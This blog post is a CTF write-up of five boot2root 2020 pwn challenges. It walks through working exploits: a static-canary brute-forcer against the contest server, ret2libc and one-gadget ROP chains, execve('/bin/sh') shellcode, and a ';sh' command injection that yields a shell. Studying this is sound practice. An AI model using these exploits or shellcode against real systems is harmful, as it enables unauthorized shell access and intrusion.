avatar

目录
boot2root 2020 pwn writeup

boot2root 2020

Sun, 06 Dec. 2020, 17:30 CST — Mon, 07 Dec. 2020, 17:30 CST

bobby_boi (493pt)

Description

My boi bobby claims to be the new MC, do you have the bars to defeat him in a rap battle? Bobby will need the length of your bars beforehand tho.

nc 35.238.225.156 1002

Author: Viper_S

Attachment

bobby_boi

Analysis

og_bars is used as the static canary in this challenge,

c
1
2
3
4
5
6
7
8
9
10
11
char og_bars[BAR_SIZE];

void read_og_bars(){
FILE *f = fopen("og_bars.txt", "r");
if(f == NULL){
printf("The OG bars are missing, either run the binary on the server or contact admin.\n");
exit(0);
}
fread(og_bars, sizeof(char), BAR_SIZE, f);
fclose(f);
}

and Stack Smashing Detected will be triggered while og_bars modified.

c
1
2
3
4
if(memcmp(bars, og_bars, BAR_SIZE)){
printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
exit(-1);
}

NOTE: Stack Smashing Detected will NOT be triggered if we overwrite og_bar to the right value.

Here are two bof in this challenge :

c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void rap_battle(){
char bars[BAR_SIZE];
char buf[MAXLEN];
char bar_len[MAXLEN];
int count, x=0;

memcpy(bars, og_bars, BAR_SIZE);
puts("Can you defeat bobby in a rap battle?\n");
printf("What's the size of your bars?\n");
while(x<MAXLEN){
read(0, bar_len+x, 1);
if (bar_len[x] == '\n') break;
x++;
}
sscanf(bar_len, "%d", &count);

puts("Spit your bars here: ");

read(0, buf, count);
gets(buf);

if(memcmp(bars, og_bars, BAR_SIZE)){
printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
exit(-1);
}
fflush(stdout);
}

Solution

We can use read(0, buf, count) to brute force the static canary.

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/usr/bin/python
#coding=utf-8
#__author__:TaQini

from pwn import *
from sys import argv

local_file = './bobby_boi'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'

elf = ELF(local_file)

# context.log_level = 'debug'
context.arch = elf.arch

def bf(og_bar,c):
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

# p = process(local_file)
p = remote('35.238.225.156',1002)

payload = 'A'*36+og_bar+c
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
sl('')
try:
data = rc()
print data
p.close()
return -1
except Exception as e:
print 'good'
p.close()
return c

og_bar = ''
if(len(argv)>1):
og_bar = argv[1]
table = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\n'
while len(og_bar)<=8:
for c in table:
res = bf(og_bar,c)
print 'trying',og_bar+c
if res != -1:
og_bar += c
break
# pause()
print 'og_bar:', og_bar

after we know the canary, we can easily solve it by ret2libc.

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
main = 0x000000000040134B

# leak libc and back to main
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
debug()
payload += cyclic(12)
payload += p64(prdi) + p64(elf.got['fopen'])
payload += p64(elf.sym['puts'])
payload += p64(main)
sl(payload)

fopen = uu64(rc(6))
libcbase = fopen - libc.sym['fopen']

og = [283174,283258,983908,987655]

# one gadget
payload = 'A'*36+'-V1p3R_$'
sla('What\'s the size of your bars?\n',str(len(payload)))
sea('Spit your bars here: \n',payload)
payload += cyclic(12)
payload += p64(libcbase+og[0])
sl(payload)

flag: b00t2root{y3Ah_Ye4h_b0bbY_b0y_H3_B3_f33l1n_H1m5elf_SG9taWNpZGU=}

More

you can download full exp from my github

canned (491pt)

Description

I think i got my flag stuck in a can, can you open it for me

nc 35.238.225.156 1007

Author: Viper_S

Attachment

canned

Analysis

No PIE, leak libc and canary then ret2libc

Solution

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
prdi = 0x00000000004012bb # pop rdi ; ret

sla('Say something please\n','%15$p%17$p')
canary = int(rc(len('0xb12bbce59c5ee300')),16)
libcbase = int(rc(len('0x7f19e320d0b3')),16) - 0x21bf7

sh = libc.search('/bin/sh').next() + libcbase
system = libc.sym['system'] + libcbase

payload = cyclic(24)
payload += p64(canary)
payload += p64(0xdeadbeef)
payload += p64(prdi+1)
payload += p64(prdi) + p64(sh)
payload += p64(system)

sl(payload)

More

you can download full exp from my github

shellCode (477pt) & Shellcode loooong (495pt)

Description

I dont like long long shellcodes keep them short and crispy

nc 35.238.225.156 1008

Author: TheBadGuy

Attachment

shellcode, shellcode

Analysis

no canary, stack is executable and buf address is leaked, so we can jump to shellcode in the buf

Solution

python
1
2
3
4
5
6
7
8
9
10
11
ru('ed to[')
buf = int(ru(']'),16)

sc = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

offset = 24
payload = 'A'*offset
payload += p64(buf+24+8)
payload += sc

sl(payload)

More

you can download full exp from my github

Roppy ropper (467pt)

Description

I love ropes do you?

nc 35.238.225.156 1004

Author: TheBadGuy

Attachment

lsass

Analysis

statically linked:

bash
1
2
% ldd lsass 
not a dynamic executable

run_command:

c
1
2
3
4
5
6
int __cdecl run_command(char a1){
char v2; // [esp+6h] [ebp-12h]
snprintf(&v2, 7, "ls %s", a1);
printf("Result: %s:\n", (unsigned int)&v2);
return system(&v2);
}

we can append sh after ls with ; to get a shell

payload: ls ;sh

Solution

bash
1
2
3
4
5
6
7
8
9
10
% nc 35.238.225.156 1004 
(list_me_like_crazy)
Is this lsass I dont understand :)
Give me your arguments:
;sh
Result: ls ;sh:
flag.txt
lsass
cat flag.txt
b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

flag: b00t2root{R0p_cHa1nS_ar3_tH3_b3st}

More

you can download full exp from my github

Welcome To Pwn (457pt)

Description

Welcome to pwn, here is an easy challenge to get you started.

nc 35.238.225.156 1001

Author: Viper_S

Attachment

welcome

Analysis

ret2win

Solution

python
1
2
3
4
5
offset = 152
payload = 'A'*offset
payload += p64(0x00401186)
sl(payload)
p.interactive()

More

you can download full exp from my github

文章作者: TaQini
文章链接: http://taqini.space/2020/12/07/boot2root2020-pwn-writeup/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 TaQini
打赏
  • Wechat
    Wechat
  • Alipay
    Alipay

评论